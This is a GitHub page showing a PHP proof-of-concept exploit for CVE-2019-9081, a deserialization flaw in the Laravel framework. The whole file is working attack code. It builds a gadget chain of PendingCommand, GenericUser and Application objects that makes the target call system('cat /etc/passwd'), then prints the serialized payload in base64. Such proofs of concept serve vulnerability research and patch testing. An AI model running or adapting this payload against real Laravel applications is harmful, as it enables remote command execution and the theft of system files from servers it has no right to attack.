-
Notifications
You must be signed in to change notification settings - Fork 2
/
CVE-2019-9081_poc.php
60 lines (47 loc) · 1.5 KB
/
CVE-2019-9081_poc.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<?php
namespace Illuminate\Foundation\Testing {
class PendingCommand
{
public $test; // Illuminate\Auth\GenericUser
protected $app; // Illuminate\Foundation\Application
protected $command; // "system"
protected $parameters; // ["id"]
protected $hasExecuted = false;
public function __construct($command, $parameters, $test, $app)
{
$this->command = $command;
$this->parameters = array($parameters);
$this->test = $test;
$this->app = $app;
}
}
}
namespace Illuminate\Auth {
class GenericUser
{
protected $attributes;
public function __construct(array $attributes)
{
$this->attributes = $attributes;
}
}
}
namespace Illuminate\Foundation {
class Application
{
protected $bindings;
public function __construct($bindings)
{
$this->bindings = $bindings;
}
}
}
namespace Payload {
use Illuminate\Auth\GenericUser;
use Illuminate\Foundation\Application;
use Illuminate\Foundation\Testing\PendingCommand;
$temp1 = array("expectedOutput" => ['whatever'], "expectedQuestions" => ['whatever']);
$temp2 = array("Illuminate\Contracts\Console\Kernel" => array("concrete" => "Illuminate\Foundation\Application"));
$evilObject = new PendingCommand("system", "cat /etc/passwd", new GenericUser($temp1), new Application($temp2));
echo base64_encode(serialize($evilObject));
}